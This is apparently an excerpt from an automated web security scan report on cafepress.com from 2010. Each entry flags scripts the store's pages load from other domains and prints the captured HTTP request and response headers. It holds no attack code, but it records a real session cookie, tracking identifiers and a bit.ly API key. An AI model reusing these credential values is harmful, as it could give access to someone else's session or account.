Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59255
Date: Sun, 26 Dec 2010 13:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content6.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.17. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+eat_sleep_game_light_tshirt,299007536

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content2.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content7.cpcache.com/js/http_request.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 93204
Date: Sun, 26 Dec 2010 13:49:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://content7.cpcache.com/js/http_request.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script src="http://content2.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"></script>
...[SNIP]...

5.18. http://www.cafepress.com/+framed-prints previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+framed-prints

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 63735
Date: Sun, 26 Dec 2010 13:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.19. http://www.cafepress.com/+greeting_cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+greeting_cards

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59651
Date: Sun, 26 Dec 2010 13:48:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.20. http://www.cafepress.com/+hats-caps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+hats-caps

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59393
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.21. http://www.cafepress.com/+ipad-cases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+ipad-cases

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 88266
Date: Sun, 26 Dec 2010 13:44:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 88266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.22. http://www.cafepress.com/+iphone-cases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+iphone-cases

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content5.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
